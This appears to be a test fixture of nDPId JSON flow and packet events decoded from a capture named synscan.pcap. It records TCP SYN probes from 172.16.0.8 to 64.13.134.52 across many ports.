+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAkAADMG5WmsEAAIQA2GNIzSAgzdUoMYAAAAAGACEAAmgwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsuKkAAC0GYsmsEAAIQA2GNIzSE+zdUoMYAAAAAGACCAAcowAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsn50AADoGbtWsEAAIQA2GNIzSBEPdUoMYAAAAAGACDAAoTAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP3kAADcG0fmsEAAIQA2GNIzSOpjdUoMYAAAAAGACEADt9gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQ4AAC4GsWSsEAAIQA2GNIzSABPdUoMYAAAAAGACDAAsfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsxlsAADgGShesEAAIQA2GNIzSB\/rdUoMYAAAAAGACBAAslQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsOUgAAC8G4CqsEAAIQA2GNIzSBHLdUoMYAAAAAGACEAAkHQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshl8AADYGjBOsEAAIQA2GNIzSF0jdUoMYAAAAAGACDAAVRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshqYAACwGlcysEAAIQA2GNIzSCGDdUoMYAAAAAGACBAAsLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsrlkAADsGXxmsEAAIQA2GNIzSBFLdUoMYAAAAAGACEAAkPQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP9EAAC4G2qGsEAAIQA2GNIzSEV7dUoMYAAAAAGACDAAbMQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs6z0AACoGMzWsEAAIQA2GNIzSFTjdUoMYAAAAAGACDAAXVwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs56MAADUGK8+sEAAIQA2GNIzSH5XdUoMYAAAAAGACCAAQ+gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ4kAAC8G8emsEAAIQA2GNIzSCEfdUoMYAAAAAGACEAAgSAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAskOgAADcGgIqsEAAIQA2GNIzTWZvdU4MZAAAAAGACEADO8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUkAADcGnCmsEAAIQA2GNIzTAZbdU4MZAAAAAGACEAAm9gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdt4AADEGoJSsEAAIQA2GNIzTBvbdU4MZAAAAAGACCAAplgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsDDQAACoGEj+sEAAIQA2GNIzTBBrdU4MZAAAAAGACDAAocgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKAAADUGntKsEAAIQA2GNIzTgkrdU4MZAAAAAGACCACuQQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsUMkAACkGzqmsEAAIQA2GNIzTAP\/dU4MZAAAAAGACCAAvjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs188AADYGOqOsEAAIQA2GNIzTIczdU4MZAAAAAGACDAAKwAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsywEAACkGVHGsEAAIQA2GNIzTA+DdU4MZAAAAAGACCAAsrAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs13sAADoGNvesEAAIQA2GNIzTDcfdU4MZAAAAAGACDAAexQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAstKwAADMGYMasEAAIQA2GNIzTI4LdU4MZAAAAAGACEAAFCgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs+qYAAC8GHsysEAAIQA2GNIzTINLdU4MZAAAAAGACEAAHugAAAgQFtA=="} 
